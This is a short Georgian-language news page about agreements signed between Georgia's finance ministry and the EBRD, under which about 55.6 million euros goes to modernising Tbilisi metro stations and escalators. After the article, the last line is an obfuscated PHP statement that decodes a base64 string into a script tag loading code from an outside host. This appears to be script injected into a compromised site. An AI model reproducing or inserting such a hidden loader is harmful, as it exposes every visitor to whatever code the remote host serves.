celsiusi
ავერსი საქკაბელი
საქართველოსა და ევროპის რეკონსტრუქციისა და განვითარების ბანკს (EBRD) შორის, ხელი მოეწერა შეთანხმებებს, რომელიც ითვალისწინებს თბილისის მეტროს მოდერნიზაციას.
სასესხო და საგრანტო შეთანხმებებს ხელი მოაწერეს საქართველოს ფინანსთა მინისტრმა, ლაშა ხუციშვილმა და პოლიტიკისა და პარტნიორობის საკითხებში ევროპის რეკონსტრუქციისა და განვითარების ბანკის (EBRD) ვიცე-პრეზიდენტმა, მარკ ბოუმენმა, რომელიც საქართველოში კავკასიური ტურნეს ფარგლებში სამუშაო ვიზიტით იმყოფება.
დაახლოებით, 55.6 მლნ ევროს ოდენობის ფინანსური რესურსი მოხმარდება თბილისის მეტროს სადგურების რეაბილიტაციასა და მეტროს ესკალატორების განახლებას.
პროექტის განმახორციელებელი იქნება ქალაქ თბილისის მუნიციპალიტეტის მერია, თბილისის სატრანსპორტო კომპანიის მეშვეობით.
ევროპის რეკონსტრუქციისა და განვითარების ბანკის (EBRD) ვიცე-პრეზიდენტი პოლიტიკისა და პარტნიორობის საკითხებში მარკ ბოუმენი საქართველოში იმყოფება აღმოსავლეთ ევროპასა და კავკასიაში ბანკის მმართველ დირექტორთან, მატეო პატრონესთან ერთად. ვიზიტს 2022 წლის სექტემბერში წინ უძღვოდა EBRD-ის პრეზიდენტის, ოდილ რენო-ბასოს შეხვედრები თბილისში.
ამჟამად, ვიზიტის მიზანია მომავალი პროექტების განხილვა, როგორც კერძო, ასევე, საჯარო სექტორში.
ინფორმაციას ფინანსთა სამინისტროს პრესსამსახური ავრცელებს.
355
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");